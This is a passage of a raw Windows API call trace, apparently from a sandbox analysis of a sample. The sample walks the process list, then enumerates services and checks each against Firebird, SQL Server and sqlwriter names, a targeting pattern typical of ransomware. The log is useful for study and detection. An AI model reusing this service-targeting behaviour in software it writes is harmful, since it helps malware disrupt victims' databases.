cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0208.974] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0208.974] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0208.975] lstrlenW (lpString="taskhostw.exe") returned 13 [0208.975] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0208.976] lstrlenW (lpString="sppsvc.exe") returned 10 [0208.976] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0208.978] lstrlenW (lpString="svchost.exe") returned 11 [0208.978] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0208.979] lstrlenW (lpString="Pg.exe") returned 6 [0208.979] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0208.979] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0208.979] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0208.980] lstrlenW (lpString="conhost.exe") returned 11 [0208.980] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0208.981] lstrlenW (lpString="cmd.exe") returned 7 [0208.981] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0208.982] lstrlenW (lpString="conhost.exe") returned 11 [0208.982] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0208.982] lstrlenW (lpString="mode.com") returned 8 [0208.982] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0208.983] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0208.983] Process32NextW (in: hSnapshot=0x3dc, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 0 [0208.984] CloseHandle (hObject=0x3dc) returned 1 [0208.984] Sleep (dwMilliseconds=0x1f4) [0209.497] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b878 [0209.498] EnumServicesStatusExW (in: hSCManager=0x236b878, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0209.498] GetLastError () returned 0xea [0209.498] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2090) returned 0x40f9e88 [0209.499] EnumServicesStatusExW (in: hSCManager=0x236b878, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x40f9e88, cbBufSize=0x2090, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x40f9e88, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0209.499] CloseServiceHandle (hSCObject=0x236b878) returned 1 [0209.500] lstrlenW (lpString="Appinfo") returned 7 [0209.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0209.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0209.500] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0209.500] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0209.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0209.500] lstrlenW (lpString="AppXSvc") returned 7 [0209.500] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0209.500] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0209.500] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0209.500] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0209.500] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0209.501] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0209.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0209.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0209.501] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0209.501] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0209.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0209.501] lstrlenW (lpString="Audiosrv") returned 8 [0209.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0209.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0209.501] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0209.501] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0209.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0209.501] lstrlenW (lpString="BFE") returned 3 [0209.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0209.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0209.501] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0209.501] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0209.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0209.501] lstrlenW (lpString="BITS") returned 4 [0209.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0209.501] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0209.501] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0209.501] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0209.501] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0209.501] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0209.501] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0209.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0209.502] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0209.502] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0209.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0209.502] lstrlenW (lpString="CDPSvc") returned 6 [0209.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0209.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0209.502] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0209.502] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0209.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0209.502] lstrlenW (lpString="ClickToRunSvc") returned 13 [0209.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0209.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0209.502] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0209.502] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0209.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0209.502] lstrlenW (lpString="ClipSVC") returned 7 [0209.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0209.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0209.502] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0209.502] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0209.502] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0209.502] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0209.502] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0209.502] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0209.503] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0209.503] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0209.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0209.503] lstrlenW (lpString="CryptSvc") returned 8 [0209.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0209.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0209.503] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0209.503] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0209.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0209.503] lstrlenW (lpString="DcomLaunch") returned 10 [0209.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0209.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0209.503] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0209.503] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0209.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0209.503] lstrlenW (lpString="DeviceAssociationService") returned 24 [0209.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0209.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0209.503] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0209.503] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0209.503] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0209.503] lstrlenW (lpString="Dhcp") returned 4 [0209.503] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0209.503] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0209.504] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0209.504] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0209.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0209.504] lstrlenW (lpString="Dnscache") returned 8 [0209.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0209.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0209.504] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0209.504] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0209.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0209.504] lstrlenW (lpString="DoSvc") returned 5 [0209.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0209.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0209.504] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0209.504] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0209.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0209.504] lstrlenW (lpString="DPS") returned 3 [0209.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0209.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0209.504] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0209.504] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0209.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0209.504] lstrlenW (lpString="DusmSvc") returned 7 [0209.504] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0209.504] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0209.504] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0209.504] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0209.504] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0209.505] lstrlenW (lpString="EventLog") returned 8 [0209.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0209.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0209.505] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0209.505] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0209.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0209.505] lstrlenW (lpString="EventSystem") returned 11 [0209.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0209.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0209.505] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0209.505] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0209.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0209.505] lstrlenW (lpString="FontCache") returned 9 [0209.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0209.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0209.505] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0209.505] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0209.505] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0209.505] lstrlenW (lpString="gpsvc") returned 5 [0209.505] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0209.505] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0209.505] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0209.506] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0209.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0209.506] lstrlenW (lpString="iphlpsvc") returned 8 [0209.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0209.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0209.506] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0209.506] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0209.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0209.506] lstrlenW (lpString="KeyIso") returned 6 [0209.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0209.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0209.506] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0209.506] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0209.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0209.506] lstrlenW (lpString="LanmanServer") returned 12 [0209.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0209.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0209.506] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0209.506] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0209.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0209.506] lstrlenW (lpString="LanmanWorkstation") returned 17 [0209.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0209.506] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0209.506] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0209.506] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0209.506] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0209.506] lstrlenW (lpString="lfsvc") returned 5 [0209.506] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0209.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0209.507] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0209.507] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0209.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0209.507] lstrlenW (lpString="LicenseManager") returned 14 [0209.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0209.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0209.507] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0209.507] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0209.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0209.507] lstrlenW (lpString="lmhosts") returned 7 [0209.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0209.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0209.507] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0209.507] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0209.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0209.507] lstrlenW (lpString="LSM") returned 3 [0209.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0209.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0209.507] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0209.507] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0209.507] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0209.507] lstrlenW (lpString="MpsSvc") returned 6 [0209.507] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0209.507] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0209.507] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0209.507] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0209.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0209.508] lstrlenW (lpString="NcbService") returned 10 [0209.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0209.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0209.508] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0209.508] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0209.508] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0209.508] lstrlenW (lpString="netprofm") returned 8 [0209.508] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0209.508] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0209.509] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0209.509] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0209.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0209.509] lstrlenW (lpString="NlaSvc") returned 6 [0209.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0209.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0209.509] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0209.509] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0209.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0209.509] lstrlenW (lpString="nsi") returned 3 [0209.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0209.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0209.509] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0209.509] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0209.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0209.509] lstrlenW (lpString="PcaSvc") returned 6 [0209.509] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0209.509] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0209.509] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0209.509] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0209.509] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0209.510] lstrlenW (lpString="PlugPlay") returned 8 [0209.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0209.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0209.510] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0209.510] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0209.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0209.510] lstrlenW (lpString="Power") returned 5 [0209.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0209.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0209.510] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0209.510] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0209.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0209.510] lstrlenW (lpString="ProfSvc") returned 7 [0209.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0209.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0209.510] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0209.510] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0209.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0209.510] lstrlenW (lpString="RpcEptMapper") returned 12 [0209.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0209.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0209.510] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0209.510] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0209.510] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0209.510] lstrlenW (lpString="RpcSs") returned 5 [0209.510] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0209.510] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0209.510] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0209.510] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0209.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0209.511] lstrlenW (lpString="SamSs") returned 5 [0209.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0209.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0209.511] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0209.511] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0209.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0209.511] lstrlenW (lpString="Schedule") returned 8 [0209.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0209.511] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0209.511] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0209.511] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0209.511] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0209.511] lstrlenW (lpString="SecurityHealthService") returned 21 [0209.511] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 